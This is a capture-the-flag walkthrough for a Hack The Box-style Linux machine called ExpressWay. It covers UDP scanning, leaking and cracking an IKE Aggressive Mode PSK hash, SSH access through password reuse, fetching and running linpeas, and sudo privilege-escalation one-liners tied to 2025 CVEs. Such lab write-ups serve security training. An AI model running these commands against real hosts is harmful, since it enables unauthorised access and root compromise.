🧠 OVERVIEW

Target: ExpressWay (Easy Linux box)

Skills learned:

• UDP enumeration
• IKE/IPSec exploitation
• Password cracking
• Service enumeration
• Privilege escalation (sudo CVEs)

🔍 STEP 1: RECONNAISSANCE

Start with TCP scan:

nmap -sC -sV -p- --min-rate 2000 -Pn <TARGET_IP>

• Copy

  -sC

  → Default scripts (version detection + vulnerability checks)
• Copy

  -sV

  → Service/version fingerprinting
• Copy

  -p-

  → Scan all 65,535 TCP ports
• Copy

  --min-rate 2000

  → Speed up scanning (aggressive but reliable on HTB)
• Copy

  -Pn

  → Skip host discovery (target may drop ICMP)

📊 Result

Only port 22 (SSH) open.

Looks clean… but this is misleading.

🧠 LESSON

TCP-only scanning is NOT enough.

👉 Always check UDP.

🌐 STEP 2: UDP SCAN

nmap -sU -p- --min-rate 1000 -Pn <TARGET_IP>

📊 Result

UDP 500 → IKE service

🧠 WHY IMPORTANT

IKE is used in VPNs.

👉 Misconfigurations here = serious vulnerability.

💣 STEP 3: IKE AGGRESSIVE MODE ATTACK

Probe IKE:

ike-scan -A <TARGET_IP>

• Copy

  -M

  → Multiline output (easier to parse)
• Copy

  -A

  → Aggressive Mode (forces the server to respond with ID and HASH_R)

Extract hash:

ike-scan -A --pskcrack <TARGET_IP> > psk.log

• Copy

  --pskcrack

  → Outputs the exact parameters required for cracking tools
  
  Copy

  (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r)

Key Output:

• ID →
  Copy

  ike@expressway.htb

• Raw PSK hash → used for password cracking (hashcat / psk-crack)

🧠 WHAT HAPPENS

Aggressive Mode leaks PSK hash.

🔓 STEP 4: CRACK PASSWORD

hashcat -m 5400 ike.hash rockyou.txt

📊 Result

Password found.

🧠 LESSON

Weak PSKs = easy compromise.

🔐 STEP 5: INITIAL ACCESS

ssh ike@<TARGET_IP>

Password = cracked PSK

🧠 COMMON MISTAKE

Password reuse.

📂 STEP 6: ENUMERATION

Check services:

nmap -sU -p 69 --script tftp-enum <TARGET_IP>

🧠 RESULT

Download Cisco config files (often contain more creds or network diagrams). In this box it’s a red herring for the main path, but shows thorough enum.

🧪 STEP 7: LINPEAS

wget https://.../linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

🧠 RESULT

Key finding: Outdated sudo (vulnerable to CVE-2025-32463 and CVE-2025-32462).

⚡ STEP 8: PRIVILEGE ESCALATION

Exploit sudo vulnerability:

sudo -R /tmp/chroot /bin/sh

OR:

sudo -h target -i

🧠 WHY THIS WORKS

• Sudo path resolution flaw
• Hostname bypass vulnerability

👑 STEP 9: ROOT ACCESS

You now have root.

📂 Get flags:

/home/ike/user.txt
/root/root.txt

🧠 FINAL LESSONS

• Always scan UDP
• Misconfigured VPNs are dangerous
• Password reuse kills security
• Enumeration is everything
• Outdated software = easy root

🔥 FINAL MESSAGE

This is how real attackers think:

Enumerate → Exploit → Escalate → Own